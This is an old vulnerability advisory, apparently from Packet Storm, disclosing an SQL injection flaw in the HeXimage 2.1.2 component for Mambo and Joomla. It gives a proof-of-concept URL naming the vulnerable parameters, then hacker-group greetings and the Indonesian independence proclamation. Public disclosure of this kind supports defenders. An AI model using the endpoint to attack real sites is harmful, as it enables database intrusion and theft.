Mambo / Joomla HeXimage 2.1.2 SQL Injection

2010-08-17T00:00:00
ID PACKETSTORM:92855
Type packetstorm
Reporter Don Tukulesto
Modified 2010-08-17T00:00:00

Description

                                        
                                            `[o]========================================================[o]  
  
[!] Mambo & Joomla! Component HeXimage SQL Injection Vulnerability  
[!] Author : Don Tukulesto (root@indonesiancoder.com)  
[!] Homepage : http://indonesiancoder.com  
[!] Date : Tue, August 17, 2010  
  
[o]========================================================[o]  
  
[ Software Information ]  
  
[>] Vendor : http://www.joomlafrance.org  
[>] Download : http://www.joomlafrance.org/telecharger/startdown/HeXimage.html  
[>] Version : 2.1.2  
[>] License : GNU General Public License  
[>] Type : Non-Commercial ( open source CMS )  
[>] Method : SQL Injection  
  
========================================================  
  
[ Proof of Concept ]  
  
http://[site]/index.php?option=com_heximage&task=selector&albumselected=INDONESIANCODER&pID=31337  
  
========================================================  
  
[ We are ]  
  
[>] Indonesian Coder Team - AntiSecurity - ServerIsDown - SurabayaHackerLink  
[>] M364TR0N | DEESSAINT | Cyb3r_tr0n | Gonzhack | kaMtiEz | El N4ck0 | ibl13Z | arianom  
[>] elv1n4 | YaDoY666 | ./Jack- | xshadow | M3NW5 | Pathloader | Mboys | Contrex | amxku  
[>] xnitro @xtremenitro.org | DraCoola | Senot | ran | CherCut & bocah|duduL | Ghambass | CS-31  
[>] James Brown & Todd @packetstormsecurity.org | Maksymilian & sp3x @securityreason.com  
  
[ Notes ]  
  
[>] Proclamation of Indonesian Independence  
  
PROCLAMATION  
  
WE THE PEOPLE OF INDONESIA HEREBY DECLARE THE INDEPENDENCE OF INDONESIA.  
MATTERS WHICH CONCERN THE TRANSFER OF POWER AND OTHER THINGS WILL BE EXECUTED  
BY CAREFUL MEANS AND IN THE SHORTEST POSSIBLE TIME.  
  
DJAKARTA, AUGUST 17, 1945  
  
IN THE NAME OF THE PEOPLE OF INDONESIA  
SOEKARNO Ñ HATTA  
`